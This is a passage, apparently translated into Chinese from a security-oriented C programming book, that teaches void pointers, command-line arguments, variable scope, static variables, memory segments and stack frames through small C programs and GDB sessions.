在此代码中，当指针最初设置时，数据会被转换成指针的数据类型。这将防止 C 编译器对冲突的数据类型发出抱怨；然而，任何指针运算仍然是不正确的。为了修复这个问题，当向指针加 1 时，它们必须首先被转换成正确的数据类型，以便地址能以正确的量增加。然后这个指针需要再次被转换回指针的数据类型。这看起来不太美观，但它是有效的。

reader@hacking:~/booksrc $ gcc pointer_types3.c
reader@hacking:~/booksrc $ ./a.out
[integer pointer] points to 0xbffff810, which contains the char 'a'
[integer pointer] points to 0xbffff811, which contains the char 'b'
[integer pointer] points to 0xbffff812, which contains the char 'c'
[integer pointer] points to 0xbffff813, which contains the char 'd'
[integer pointer] points to 0xbffff814, which contains the char 'e'
[char pointer] points to 0xbffff7f0, which contains the integer 1
[char pointer] points to 0xbffff7f4, which contains the integer 2
[char pointer] points to 0xbffff7f8, which contains the integer 3
[char pointer] points to 0xbffff7fc, which contains the integer 4
[char pointer] points to 0xbffff800, which contains the integer 5
reader@hacking:~/booksrc $

自然地，一开始就为指针使用正确的数据类型要容易得多；然而，有时需要一个通用的、无类型的指针。在 C 语言中，空指针是一个无类型的指针，由void关键字定义。对空指针的实验很快就会揭示关于无类型指针的一些事情。首先，指针不能被取消引用除非它们有一个类型。为了检索指针内存地址中存储的值，编译器必须首先知道它是什么类型的数据。其次，在进行指针运算之前，空指针也必须进行类型转换。这些限制相当直观，这意味着空指针的主要目的是简单地持有内存地址。

可以通过每次使用时将其类型转换成正确的类型来修改 pointer_types3.c 程序，以使用单个空指针。编译器知道空指针是无类型的，所以任何类型的指针都可以存储在空指针中而不需要类型转换。这也意味着在取消引用时，空指针必须始终进行类型转换。这些差异可以在使用空指针的 pointer_types4.c 中看到。

pointer_types4.c

#include <stdio.h>

int main() {
   int i;

   char char_array[5] = {'a', 'b', 'c', 'd', 'e'};
   int int_array[5] = {1, 2, 3, 4, 5};

   void *void_pointer;

   void_pointer = (void *) char_array;

   for(i=0; i < 5; i++) { // Iterate through the int array with the int_pointer.
      printf("[char pointer] points to %p, which contains the char '%c'\n",
            void_pointer, *((char *) void_pointer));
      void_pointer = (void *) ((char *) void_pointer + 1);
   }

   void_pointer = (void *) int_array;

   for(i=0; i < 5; i++) { // Iterate through the int array with the int_pointer.
      printf("[integer pointer] points to %p, which contains the integer %d\n",
            void_pointer, *((int *) void_pointer));
      void_pointer = (void *) ((int *) void_pointer + 1);
   }
}

编译和执行 pointer_types4.c 的结果如下。

reader@hacking:~/booksrc $ gcc pointer_types4.c
reader@hacking:~/booksrc $ ./a.out
[char pointer] points to 0xbffff810, which contains the char 'a'
[char pointer] points to 0xbffff811, which contains the char 'b'
[char pointer] points to 0xbffff812, which contains the char 'c'
[char pointer] points to 0xbffff813, which contains the char 'd'
[char pointer] points to 0xbffff814, which contains the char 'e'
[integer pointer] points to 0xbffff7f0, which contains the integer 1
[integer pointer] points to 0xbffff7f4, which contains the integer 2
[integer pointer] points to 0xbffff7f8, which contains the integer 3
[integer pointer] points to 0xbffff7fc, which contains the integer 4
[integer pointer] points to 0xbffff800, which contains the integer 5
reader@hacking:~/booksrc $

pointer_types4.c 的编译和输出基本上与 pointer_types3.c 相同。空指针实际上只是持有内存地址，而硬编码的类型转换则告诉编译器在指针使用时使用正确的类型。

由于类型由类型转换处理，空指针实际上不过是一个内存地址。通过类型转换定义的数据类型，任何足够大以容纳四个字节值的对象都可以像空指针一样工作。在 pointer_types5.c 中，使用无符号整数来存储这个地址。

pointer_types5.c

#include <stdio.h>

int main() {
   int i;

   char char_array[5] = {'a', 'b', 'c', 'd', 'e'};
   int int_array[5] = {1, 2, 3, 4, 5};

   unsigned int hacky_nonpointer;

   hacky_nonpointer = (unsigned int) char_array;

   for(i=0; i < 5; i++) { // Iterate through the int array with the int_pointer.
      printf("[hacky_nonpointer] points to %p, which contains the char '%c'\n",
            hacky_nonpointer, *((char *) hacky_nonpointer));
      `hacky_nonpointer = hacky_nonpointer + sizeof(char);`
   }

   hacky_nonpointer = (unsigned int) int_array;

   for(i=0; i < 5; i++) { // Iterate through the int array with the int_pointer.
      printf("[hacky_nonpointer] points to %p, which contains the integer %d\n",
            hacky_nonpointer, *((int *) hacky_nonpointer));
      `hacky_nonpointer = hacky_nonpointer + sizeof(int);`
   }
}

这相当是种权宜之计，但因为这个整数值在赋值和取消引用时被转换成了正确的指针类型，最终结果是一样的。注意，不是通过多次类型转换对无符号整数（它甚至不是一个指针）进行指针运算，而是使用sizeof()函数通过常规算术达到相同的结果。

reader@hacking:~/booksrc $ gcc pointer_types5.c
reader@hacking:~/booksrc $ ./a.out
[hacky_nonpointer] points to 0xbffff810, which contains the char 'a'
[hacky_nonpointer] points to 0xbffff811, which contains the char 'b'
[hacky_nonpointer] points to 0xbffff812, which contains the char 'c'
[hacky_nonpointer] points to 0xbffff813, which contains the char 'd'
[hacky_nonpointer] points to 0xbffff814, which contains the char 'e'
[hacky_nonpointer] points to 0xbffff7f0, which contains the integer 1
[hacky_nonpointer] points to 0xbffff7f4, which contains the integer 2
[hacky_nonpointer] points to 0xbffff7f8, which contains the integer 3
[hacky_nonpointer] points to 0xbffff7fc, which contains the integer 4
[hacky_nonpointer] points to 0xbffff800, which contains the integer 5
reader@hacking:~/booksrc $

关于 C 语言中的变量，需要记住的重要一点是编译器是唯一关心变量类型的。最终，在程序编译完成后，变量不过是一些内存地址。这意味着可以通过告诉编译器将它们类型转换为所需的类型，轻松地将一种类型的变量强制转换为另一种类型的行为。

命令行参数

许多非图形程序以命令行参数的形式接收输入。与使用scanf()输入不同，命令行参数在程序开始执行后不需要用户交互。这通常更高效，并且是一种有用的输入方法。

在 C 语言中，可以通过向函数添加两个额外的参数来在main()函数中访问命令行参数：一个整数和一个指向字符串数组的指针。整数将包含参数的数量，字符串数组将包含每个参数。commandline.c 程序及其执行应该能解释清楚。

commandline.c

#include <stdio.h>

int main(int arg_count, char *arg_list[]) {
   int i;
   printf("There were %d arguments provided:\n", arg_count);
   for(i=0; i < arg_count; i++)
      printf("argument #%d\t-\t%s\n", i, arg_list[i]);
}
reader@hacking:~/booksrc $ gcc -o commandline commandline.c
reader@hacking:~/booksrc $ ./commandline
There were 1 arguments provided:
argument #0     -       ./commandline
reader@hacking:~/booksrc $ ./commandline this is a test
There were 5 arguments provided:
argument #0     -       ./commandline
argument #1     -       this
argument #2     -       is
argument #3     -       a
argument #4     -       test
reader@hacking:~/booksrc $

零级参数始终是执行二进制的名称，其余的参数数组（通常称为参数向量）包含剩余的参数作为字符串。

有时程序可能希望将命令行参数用作整数而不是字符串。不管怎样，参数都是以字符串的形式传递的；然而，存在标准转换函数。与简单的类型转换不同，这些函数实际上可以将包含数字的字符数组转换为实际的整数。这些函数中最常见的是atoi()，它是ASCII to integer的缩写。这个函数接受一个指向字符串的指针作为其参数，并返回它所表示的整数值。观察它在 convert.c 中的使用。

convert.c

#include <stdio.h>

void usage(char *program_name) {
   printf("Usage: %s <message> <# of times to repeat>\n", program_name);
   exit(1);
}

int main(int argc, char *argv[]) {
   int i, count;

   if(argc < 3)      // If fewer than 3 arguments are used,
      usage(argv[0]); // display usage message and exit.

   count = atoi(argv[2]); // Convert the 2nd arg into an integer.
   printf("Repeating %d times..\n", count);

   for(i=0; i < count; i++)
      printf("%3d - %s\n", i, argv[1]); // Print the 1st arg.
}

编译并执行 convert.c 的结果如下。

reader@hacking:~/booksrc $ gcc convert.c
reader@hacking:~/booksrc $ ./a.out
Usage: ./a.out <message> <# of times to repeat>
reader@hacking:~/booksrc $ ./a.out 'Hello, world!' 3
Repeating 3 times..
  0 - Hello, world!
  1 - Hello, world!
  2 - Hello, world!
reader@hacking:~/booksrc $

在前面的代码中，一个if语句确保在访问这些字符串之前使用了三个参数。如果程序尝试访问不存在或程序没有权限读取的内存，程序将会崩溃。在 C 语言中，检查这些类型的条件并在程序逻辑中处理它们非常重要。如果注释掉了错误检查的if语句，就可以探索这种内存违规。convert2.c 程序应该使这一点更加明确。

convert2.c

#include <stdio.h>

void usage(char *program_name) {
   printf("Usage: %s <message> <# of times to repeat>\n", program_name);
   exit(1);
}

int main(int argc, char *argv[]) {
   int i, count;

//  if(argc < 3)      // If fewer than 3 arguments are used,
//    usage(argv[0]); // display usage message and exit.

   count = atoi(argv[2]); // Convert the 2nd arg into an integer.
   printf("Repeating %d times..\n", count);

   for(i=0; i < count; i++)
      printf("%3d - %s\n", i, argv[1]); // Print the 1st arg.
}

编译并执行 convert2.c 的结果如下。

reader@hacking:~/booksrc $ gcc convert2.c
reader@hacking:~/booksrc $ ./a.out test
Segmentation fault (core dumped)
reader@hacking:~/booksrc $

当程序没有足够的命令行参数时，它仍然试图访问参数数组中的元素，即使它们不存在。这导致程序由于段错误而崩溃。

内存被分割成段（稍后将会讨论），并且一些内存地址不在程序被赋予访问权限的内存段边界内。当程序尝试访问超出范围的地址时，它将崩溃并称为段错误。这种效果可以通过 GDB 进一步探索。

reader@hacking:~/booksrc $ gcc -g convert2.c
reader@hacking:~/booksrc $ gdb -q ./a.out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) run test
Starting program: /home/reader/booksrc/a.out test

Program received signal SIGSEGV, Segmentation fault.
0xb7ec819b in ?? () from /lib/tls/i686/cmov/libc.so.6
(gdb) where
#0  0xb7ec819b in ?? () from /lib/tls/i686/cmov/libc.so.6
#1  0xb800183c in ?? ()
#2  0x00000000 in ?? ()
(gdb) break main
Breakpoint 1 at 0x8048419: file convert2.c, line 14.
(gdb) run test
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/reader/booksrc/a.out test

Breakpoint 1, main (argc=2, argv=`0xbffff894`) at convert2.c:14
14         count = atoi(argv[2]); // convert the 2nd arg into an integer
(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xb7ec819b in ?? () from /lib/tls/i686/cmov/libc.so.6
(gdb) x/3xw 0xbffff894
0xbffff894:     0xbffff9b3      0xbffff9ce      0x00000000
(gdb) x/s 0xbffff9b3
0xbffff9b3:      "/home/reader/booksrc/a.out"
(gdb) x/s 0xbffff9ce
0xbffff9ce:      "test"
(gdb) x/s 0x00000000
0x0:     <Address 0x0 out of bounds>
(gdb) quit
The program is running.  Exit anyway? (y or n) y
reader@hacking:~/booksrc $

在 GDB 中使用单个命令行参数test执行程序，这会导致程序崩溃。where命令有时会显示有用的堆栈回溯；然而，在这种情况下，堆栈在崩溃时被严重破坏。在main函数上设置断点并重新执行程序以获取参数向量（以粗体显示）的值。由于参数向量是指向字符串列表的指针，因此它实际上是指向指针列表的指针。使用x/3xw命令检查参数向量地址存储的前三个内存地址，显示它们自身是指向字符串的指针。第一个是指零参数，第二个是test参数，第三个是零，超出了范围。当程序尝试访问这个内存地址时，它会因段错误而崩溃。

变量作用域

关于 C 语言中内存的另一个有趣的概念是变量作用域或上下文——特别是函数内变量的上下文。每个函数都有自己的局部变量集合，它们与其他一切无关。实际上，对同一函数的多次调用都有自己的上下文。你可以使用带有格式字符串的printf()函数快速探索这一点；在 scope.c 中查看它。

scope.c

#include <stdio.h>

void func3() {
   int i = 11;
   printf("\t\t\t[in func3] i = %d\n", i);
}

void func2() {
   int i = 7;
   printf("\t\t[in func2] i = %d\n", i);
   func3();
   printf("\t\t[back in func2] i = %d\n", i);
}

void func1() {
   int i = 5;
   printf("\t[in func1] i = %d\n", i);
   func2();
   printf("\t[back in func1] i = %d\n", i);
}

int main() {
   int i = 3;
   printf("[in main] i = %d\n", i);
   func1();
   printf("[back in main] i = %d\n", i);
}

这个简单程序的输出展示了嵌套函数调用。

reader@hacking:~/booksrc $ gcc scope.c
reader@hacking:~/booksrc $ ./a.out
[in main] i = 3
        [in func1] i = 5
                [in func2] i = 7
                        [in func3] i = 11
                [back in func2] i = 7
        [back in func1] i = 5
[back in main] i = 3
reader@hacking:~/booksrc $

在每个函数中，变量i被设置为不同的值并打印出来。注意，在main()函数中，变量i是 3，即使在调用func1()之后，变量i是 5。同样，在func1()中，变量i保持为 5，即使在调用func2()之后，i是 7，依此类推。最好的理解方式是，每个函数调用都有自己的变量i版本。

变量也可以具有全局作用域，这意味着它们将在所有函数中持续存在。如果变量在代码的开始处定义，且不在任何函数内部，则变量是全局的。在下面的 scope2.c 示例代码中，变量j被全局声明并设置为 42。这个变量可以被任何函数读取和写入，并且对其的更改将在函数之间持续存在。

scope2.c

#include <stdio.h>

int j = 42; // j is a global variable.

void func3() {
   int i = 11, j = 999; // Here, j is a local variable of func3().
   printf("\t\t\t[in func3] i = %d, j = %d\n", i, j);
}

void func2() {
   int i = 7;
   printf("\t\t[in func2] i = %d, j = %d\n", i, j);
   printf("\t\t[in func2] setting j = 1337\n");
   j = 1337; // Writing to j
   func3();
   printf("\t\t[back in func2] i = %d, j = %d\n", i, j);
}

void func1() {
   int i = 5;
   printf("\t[in func1] i = %d, j = %d\n", i, j);
   func2();
   printf("\t[back in func1] i = %d, j = %d\n", i, j);
}

int main() {
   int i = 3;
   printf("[in main] i = %d, j = %d\n", i, j);
   func1();
   printf("[back in main] i = %d, j = %d\n", i, j);
}

编译和执行 scope2.c 的结果如下。

reader@hacking:~/booksrc $ gcc scope2.c
reader@hacking:~/booksrc $ ./a.out
[in main] i = 3, j = 42
        [in func1] i = 5, j = 42
                [in func2] i = 7, j = 42
                [in func2] setting j = 1337
                        [in func3] i = 11, j = 999
                [back in func2] i = 7, j = 1337
        [back in func1] i = 5, j = 1337
[back in main] i = 3, j = 1337 
reader@hacking:~/booksrc $

在输出中，全局变量j在func2()中被写入，并且这种变化在除了func3()之外的所有函数中都持续存在，因为func3()有自己的局部变量名为j。在这种情况下，编译器更倾向于使用局部变量。由于所有这些变量都使用相同的名称，可能会有些混乱，但请记住，最终，这都只是内存。全局变量j只是存储在内存中，每个函数都能访问那个内存。每个函数的局部变量都存储在内存中的特定位置，无论名称是否相同。打印这些变量的内存地址将给出更清晰的画面。在下面的 scope3.c 示例代码中，变量地址是通过使用一元地址运算符来打印的。

scope3.c

#include <stdio.h>

int j = 42; // j is a global variable.

void func3() {
   int i = 11, j = 999; // Here, j is a local variable of func3().
   printf("\t\t\t[in func3] i @ 0x%08x = %d\n", &i, i);
   printf("\t\t\t[in func3] j @ 0x%08x = %d\n", &j, j);
}

void func2() {
   int i = 7;
   printf("\t\t[in func2] i @ 0x%08x = %d\n", &i, i);
   printf("\t\t[in func2] j @ 0x%08x = %d\n", &j, j);
   printf("\t\t[in func2] setting j = 1337\n");
   j = 1337; // Writing to j
   func3();
   printf("\t\t[back in func2] i @ 0x%08x = %d\n", &i, i);
   printf("\t\t[back in func2] j @ 0x%08x = %d\n", &j, j);
}

void func1() {
   int i = 5;
   printf("\t[in func1] i @ 0x%08x = %d\n", &i, i);
   printf("\t[in func1] j @ 0x%08x = %d\n", &j, j);
   func2();
   printf("\t[back in func1] i @ 0x%08x = %d\n", &i, i);
   printf("\t[back in func1] j @ 0x%08x = %d\n", &j, j);
}

int main() {
   int i = 3;
   printf("[in main] i @ 0x%08x = %d\n", &i, i);
   printf("[in main] j @ 0x%08x = %d\n", &j, j);
   func1();
   printf("[back in main] i @ 0x%08x = %d\n", &i, i);
   printf("[back in main] j @ 0x%08x = %d\n", &j, j);
}

编译和执行 scope3.c 的结果如下。

reader@hacking:~/booksrc $ gcc scope3.c 
reader@hacking:~/booksrc $ ./a.out
[in main] i @ 0xbffff834 = 3
[in main] j @ 0x08049988 = 42
        [in func1] i @ 0xbffff814 = 5
        [in func1] j @ 0x08049988 = 42
                [in func2] i @ 0xbffff7f4 = 7
                [in func2] j @ 0x08049988 = 42
                [in func2] setting j = 1337
                        [in func3] i @ 0xbffff7d4 = 11
                        [in func3] j @ 0xbffff7d0 = 999
                [back in func2] i @ 0xbffff7f4 = 7
                [back in func2] j @ 0x08049988 = 1337
        [back in func1] i @ 0xbffff814 = 5
        [back in func1] j @ 0x08049988 = 1337
[back in main] i @ 0xbffff834 = 3
[back in main] j @ 0x08049988 = 1337
reader@hacking:~/booksrc $

在这个输出中，很明显func3()使用的变量j与其他函数使用的j不同。func3()使用的j位于0xbffff7d0，而其他函数使用的j位于0x08049988。此外，请注意变量i对每个函数来说实际上是一个不同的内存地址。

在以下输出中，GDB 用于在func3()的断点处停止执行。然后回溯命令显示了堆栈上每个函数调用的记录。

reader@hacking:~/booksrc $ gcc -g scope3.c
reader@hacking:~/booksrc $ gdb -q ./a.out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) list 1
1       #include <stdio.h>
2
3       int j = 42; // j is a global variable.
4
5       void func3() {
6          int i = 11, j = 999; // Here, j is a local variable of func3().
7          printf("\t\t\t[in func3] i @ 0x%08x = %d\n", &i, i);
8          printf("\t\t\t[in func3] j @ 0x%08x = %d\n", &j, j);
9       }
10
(gdb) break 7
Breakpoint 1 at 0x8048388: file scope3.c, line 7.
(gdb) run
Starting program: /home/reader/booksrc/a.out
[in main] i @ 0xbffff804 = 3
[in main] j @ 0x08049988 = 42
        [in func1] i @ 0xbffff7e4 = 5
        [in func1] j @ 0x08049988 = 42
                [in func2] i @ 0xbffff7c4 = 7
                [in func2] j @ 0x08049988 = 42
                [in func2] setting j = 1337

Breakpoint 1, func3 () at scope3.c:7
7          printf("\t\t\t[in func3] i @ 0x%08x = %d\n", &i, i);
(gdb) bt
#0  func3 () at scope3.c:7
#1  0x0804841d in func2 () at scope3.c:17
#2  0x0804849f in func1 () at scope3.c:26
#3  0x0804852b in main () at scope3.c:35
(gdb)

回溯还通过查看堆栈上保留的记录来显示嵌套函数调用。每次函数被调用时，都会在堆栈上放置一个称为堆栈帧的记录。回溯中的每一行对应一个堆栈帧。每个堆栈帧还包含该上下文中的局部变量。可以通过在回溯命令中添加单词full来在 GDB 中显示每个堆栈帧包含的局部变量。

(gdb) bt full
#0  func3 () at scope3.c:7
        i = 11
        j = 999
#1  0x0804841d in func2 () at scope3.c:17
        i = 7
#2  0x0804849f in func1 () at scope3.c:26
        i = 5
#3  0x0804852b in main () at scope3.c:35
        i = 3
(gdb)

完整的回溯清楚地显示局部变量j仅在func3()的上下文中存在。全局版本的变量j在其他函数的上下文中使用。

除了全局变量之外，变量也可以通过在变量定义前添加关键字static来定义为静态变量。与全局变量类似，静态变量在函数调用之间保持不变；然而，静态变量也类似于局部变量，因为它们在特定的函数上下文中保持局部。静态变量的一个不同且独特的特性是它们只初始化一次。static.c 中的代码将有助于解释这些概念。

static.c

#include <stdio.h>

void function() { // An example function, with its own context
   int var = 5;
   static int static_var = 5; // Static variable initialization

   printf("\t[in function] var = %d\n", var);
   printf("\t[in function] static_var = %d\n", static_var);
   var++;          // Add one to var.
   static_var++;   // Add one to static_var.
}

int main() { // The main function, with its own context
   int i;
   static int static_var = 1337; // Another static, in a different context

   for(i=0; i < 5; i++) { // Loop 5 times.
      printf("[in main] static_var = %d\n", static_var);
      function(); // Call the function.
   }
}

正确命名的static_var在两个地方被定义为静态变量：在main()的上下文中和在function()的上下文中。由于静态变量在特定的功能上下文中是局部的，这些变量可以具有相同的名称，但它们实际上代表内存中的两个不同位置。该函数只是在其上下文中打印两个变量的值，然后将它们各自加 1。编译和执行此代码将显示静态变量和非静态变量之间的差异。

reader@hacking:~/booksrc $ gcc static.c
reader@hacking:~/booksrc $ ./a.out
[in main] static_var = 1337
        [in function] var = 5
        [in function] static_var = 5
[in main] static_var = 1337
        [in function] var = 5
        [in function] static_var = 6
[in main] static_var = 1337
        [in function] var = 5
        [in function] static_var = 7
[in main] static_var = 1337
        [in function] var = 5
        [in function] static_var = 8
[in main] static_var = 1337
        [in function] var = 5
        [in function] static_var = 9
reader@hacking:~/booksrc $

注意，static_var在后续调用function()之间保留其值。这是因为静态变量保留其值，也因为它们只初始化一次。此外，由于静态变量是特定功能上下文内的局部变量，main()上下文中的static_var在整个过程中都保留了其值为 1337。

再次，通过使用一元地址运算符解引用这些变量的地址来打印它们，将提供对实际发生情况的更深入了解。请查看 static2.c 以获取示例。

static2.c

#include <stdio.h>

void function() { // An example function, with its own context
   int var = 5;
   static int static_var = 5; // Static variable initialization

   printf("\t[in function] var  @ %p = %d\n", &var, var);
   printf("\t[in function] static_var @ %p = %d\n", &static_var, static_var);
   var++;          // Add 1 to var.
   static_var++;   // Add 1 to static_var.
}

int main() { // The main function, with its own context
   int i;
   static int static_var = 1337; // Another static, in a different context

   for(i=0; i < 5; i++) { // loop 5 times
      printf("[in main] static_var @ %p = %d\n", &static_var, static_var);
      function(); // Call the function.
   } 
}

编译和执行 static2.c 的结果如下。

reader@hacking:~/booksrc $ gcc static2.c
reader@hacking:~/booksrc $ ./a.out
[in main] static_var @ 0x804968c = 1337
        [in function] var  @ 0xbffff814 = 5
        [in function] static_var @ 0x8049688 = 5
[in main] static_var @ 0x804968c = 1337
        [in function] var  @ 0xbffff814 = 5
        [in function] static_var @ 0x8049688 = 6
[in main] static_var @ 0x804968c = 1337
        [in function] var  @ 0xbffff814 = 5
        [in function] static_var @ 0x8049688 = 7
[in main] static_var @ 0x804968c = 1337
        [in function] var  @ 0xbffff814 = 5
        [in function] static_var @ 0x8049688 = 8
[in main] static_var @ 0x804968c = 1337
        [in function] var  @ 0xbffff814 = 5
        [in function] static_var @ 0x8049688 = 9
reader@hacking:~/booksrc $

显示变量地址后，很明显，main()中的static_var与function()中找到的static_var不同，因为它们位于不同的内存地址（分别为0x804968c和0x8049688）。你可能已经注意到，局部变量的地址都非常高，如0xbffff814，而全局和静态变量的内存地址都非常低，如0x0804968c和0x8049688。你非常敏锐——注意到这样的细节并询问为什么是黑客技术的基石之一。继续阅读以获取你的答案。

内存分段

编译程序的内存被分为五个部分：文本段、数据段、bss 段、堆和栈。每个部分代表内存中为特定目的预留的特殊部分。

文本段有时也被称为代码段。这是程序汇编的机器语言指令所在的位置。由于上述高级控制结构和函数将编译成汇编语言中的分支、跳转和调用指令，该段中的指令执行是非线性的。当程序执行时，EIP 被设置为文本段中的第一条指令。然后处理器遵循一个执行循环，执行以下操作：

读取 EIP 指向的指令
将指令的字节长度添加到 EIP
执行步骤 1 中读取的指令
返回步骤 1

有时指令将是一个跳转或调用指令，这会将 EIP 更改为内存中的不同地址。处理器并不关心这种变化，因为它本来就在期待执行是非线性的。如果 EIP 在步骤 3 中发生变化，处理器将直接回到步骤 1，并读取 EIP 更改到的地址处的指令。

文本段中的写权限被禁用，因为它不用于存储变量，只用于存储代码。这防止了人们实际修改程序代码；任何尝试写入此内存段的尝试都将导致程序通知用户发生了错误，并且程序将被终止。这个段的只读性还有另一个优点，即它可以被程序的不同副本共享，允许程序同时执行而不会出现任何问题。还应该注意的是，这个内存段的大小是固定的，因为其中没有任何东西会发生变化。

数据段和 bss 段用于存储全局和静态程序变量。数据段填充了初始化的全局和静态变量，而bss 段填充了它们的未初始化对应物。尽管这些段是可写的，但它们也有一个固定的大小。记住，全局变量是持久的，尽管它们的功能上下文（如前例中的变量j）。全局和静态变量能够持久存在，因为它们存储在自己的内存段中。

堆段是程序员可以直接控制的内存段。该段中的内存块可以被分配并用于程序员可能需要的任何用途。关于堆段的一个显著点是它的大小不是固定的，因此它可以根据需要增长或缩小。堆中的所有内存都由分配器和释放器算法管理，分别保留堆中的内存区域以供使用，并取消保留以允许该部分内存被重新用于后续的保留。堆的大小将根据保留的内存量而增长和缩小。这意味着使用堆分配函数的程序员可以在运行时保留和释放内存。堆的增长是向更高内存地址方向下降的。

栈段也具有可变大小，并在函数调用期间用作临时暂存区，用于存储局部函数变量和上下文。这就是 GDB 的 backtrace 命令查看的内容。当程序调用一个函数时，该函数将有自己的传递变量集，并且函数的代码将在文本（或代码）段的不同内存位置。由于上下文和 EIP 在函数调用时必须改变，因此栈用于记住所有传递的变量、函数完成后 EIP 应返回的位置以及该函数使用的所有局部变量。所有这些信息都存储在栈上，统称为栈帧。栈包含许多栈帧。

在计算机科学的一般术语中，栈是一种常用的抽象数据结构。它具有先进后出（FILO）的顺序，这意味着首先放入栈中的项目是最后从栈中出来的。想象一下，在一条一端有结的线绳上串珠子——你无法取下第一个珠子，直到你移除了所有的其他珠子。当一个项目放入栈中时，这被称为压入，而当一个项目从栈中移除时，这被称为弹出。

如其名所示，内存的栈段实际上是一个栈数据结构，其中包含栈帧。ESP 寄存器用于跟踪栈末端的地址，该地址随着项目的推入和弹出而不断变化。由于这是一种非常动态的行为，因此栈不是固定大小的也很有道理。与堆的动态增长相反，当栈改变大小时，它在内存的可视列表中向上增长，朝向较低的内存地址。

栈的 FILO 特性可能看起来有些奇怪，但鉴于栈用于存储上下文，它非常有用。当一个函数被调用时，一些东西会一起推入栈中，形成一个栈帧。EBP 寄存器——有时被称为帧指针（FP）或局部基（LB）指针——用于引用当前栈帧中的局部函数变量。每个栈帧都包含函数的参数、其局部变量以及两个必要的指针，用于将事物恢复原状：保存的帧指针（SFP）和返回地址。SFP用于将 EBP 恢复到其先前的值，而返回地址用于将 EIP 恢复到函数调用后找到的下一条指令。这恢复了先前栈帧的功能上下文。

以下 stack_example.c 代码有两个函数：main()和test_function()。

内存分段

stack_example.c

void test_function(int a, int b, int c, int d) {
   int flag;
   char buffer[10];

   flag = 31337;
   buffer[0] = 'A';
}

int main() {
   test_function(1, 2, 3, 4);
}

此程序首先声明了一个具有四个参数的测试函数，这些参数都被声明为整数：a、b、c和d。函数的局部变量包括一个名为flag的单个字符和一个名为buffer的 10 字符缓冲区。这些变量的内存位于栈段中，而函数代码的机器指令存储在文本段中。编译程序后，可以使用 GDB 检查其内部工作原理。下面的输出显示了main()和test_function()的反汇编机器指令。main()函数从0x08048357开始，test_function()从0x08048344开始。每个函数的前几条指令（以下用粗体显示）设置栈帧。这些指令统称为过程序言或函数序言。它们在栈上保存帧指针，并为局部函数变量保存栈内存。有时函数序言还会处理一些栈对齐。确切的序言指令将根据编译器和编译器选项有很大差异，但通常这些指令构建栈帧。

reader@hacking:~/booksrc $ gcc -g stack_example.c
reader@hacking:~/booksrc $ gdb -q ./a.out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) disass main
Dump of assembler code for function main():
`0x08048357 <main+0>:    push   ebp 0x08048358 <main+1>:    mov    ebp,esp 0x0804835a <main+3>:    sub    esp,0x18 0x0804835d <main+6>:    and    esp,0xfffffff0 0x08048360 <main+9>:    mov    eax,0x0 0x08048365 <main+14>:   sub    esp,eax`
0x08048367 <main+16>:   mov    DWORD PTR [esp+12],0x4
0x0804836f <main+24>:   mov    DWORD PTR [esp+8],0x3
0x08048377 <main+32>:   mov    DWORD PTR [esp+4],0x2
0x0804837f <main+40>:   mov    DWORD PTR [esp],0x1
0x08048386 <main+47>:   call   0x8048344 <test_function>
0x0804838b <main+52>:   leave
0x0804838c <main+53>:   ret
End of assembler dump
(gdb) disass test_function()
Dump of assembler code for function test_function:
`0x08048344 <test_function+0>:   push   ebp 0x08048345 <test_function+1>:   mov    ebp,esp 0x08048347 <test_function+3>:   sub    esp,0x28`
0x0804834a <test_function+6>:   mov    DWORD PTR [ebp-12],0x7a69
0x08048351 <test_function+13>:  mov    BYTE PTR [ebp-40],0x41
0x08048355 <test_function+17>:  leave
0x08048356 <test_function+18>:  ret
End of assembler dump
(gdb)

当程序运行时，调用main()函数，该函数简单地调用test_function()。

当从main()函数调用test_function()函数时，各种值被推送到栈中以创建栈帧的起始部分，如下所示。当调用test_function()时，函数参数以相反的顺序（因为它是 FILO）推送到栈上。函数的参数是 1、2、3 和 4，因此后续的推指令将 4、3、2 和最后 1 推送到栈上。这些值对应于函数中的变量d、c、b和a。将这些值推送到栈上的指令在下面的main()函数反汇编中用粗体显示。

(gdb) disass main
Dump of assembler code for function main:
0x08048357 <main+0>:    push   ebp
0x08048358 <main+1>:    mov    ebp,esp
0x0804835a <main+3>:    sub    esp,0x18
0x0804835d <main+6>:    and    esp,0xfffffff0
0x08048360 <main+9>:    mov    eax,0x0
0x08048365 <main+14>:   sub    esp,eax
`0x08048367 <main+16>:   mov    DWORD PTR [esp+12],0x4 0x0804836f <main+24>:   mov    DWORD PTR [esp+8],0x3 0x08048377 <main+32>:   mov    DWORD PTR [esp+4],0x2 0x0804837f <main+40>:   mov    DWORD PTR [esp],0x1`
0x08048386 <main+47>:   call   0x8048344 <test_function>
0x0804838b <main+52>:   leave
0x0804838c <main+53>:   ret
End of assembler dump
(gdb)

接下来，当执行汇编调用指令时，返回地址被推送到栈上，执行流程跳转到test_function()的起始地址0x08048344。返回地址的值将是当前 EIP 之后的指令位置——具体来说，是之前提到的执行循环的第 3 步中存储的值。在这种情况下，返回地址将指向main()中的 leave 指令，地址为0x0804838b。

调用指令既将返回地址存储在堆栈上，又将 EIP 跳转到 test_function() 的开始处，因此 test_function() 的过程序言指令完成了堆栈帧的构建。在这一步中，当前 EBP 的值被推送到堆栈上。这个值被称为保存的帧指针（SFP），稍后用于将 EBP 恢复到其原始状态。然后，当前 ESP 的值被复制到 EBP 中以设置新的帧指针。这个帧指针用于引用函数的局部变量（flag 和 buffer）。通过从 ESP 中减去来为这些变量保存内存。最后，堆栈帧看起来可能如下所示：

图 0x200-1。

我们可以使用 GDB 在堆栈上观察堆栈帧的构建过程。在下面的输出中，在调用 test_function() 之前以及在 test_function() 开始处设置了断点。GDB 将第一个断点放在函数参数推送到堆栈之前，第二个断点放在 test_function() 的过程序言之后。当程序运行时，执行会在断点处停止，此时会检查寄存器的 ESP（堆栈指针）、EBP（帧指针）和 EIP（执行指针）。

(gdb) list main
4
5          flag = 31337;
6          buffer[0] = 'A';
7       }
8
9       int main() {
10         test_function(1, 2, 3, 4);
11      }
(gdb) break 10
Breakpoint 1 at 0x8048367: file stack_example.c, line 10.
(gdb) break test_function
Breakpoint 2 at 0x804834a: file stack_example.c, line 5.
(gdb) run
Starting program: /home/reader/booksrc/a.out

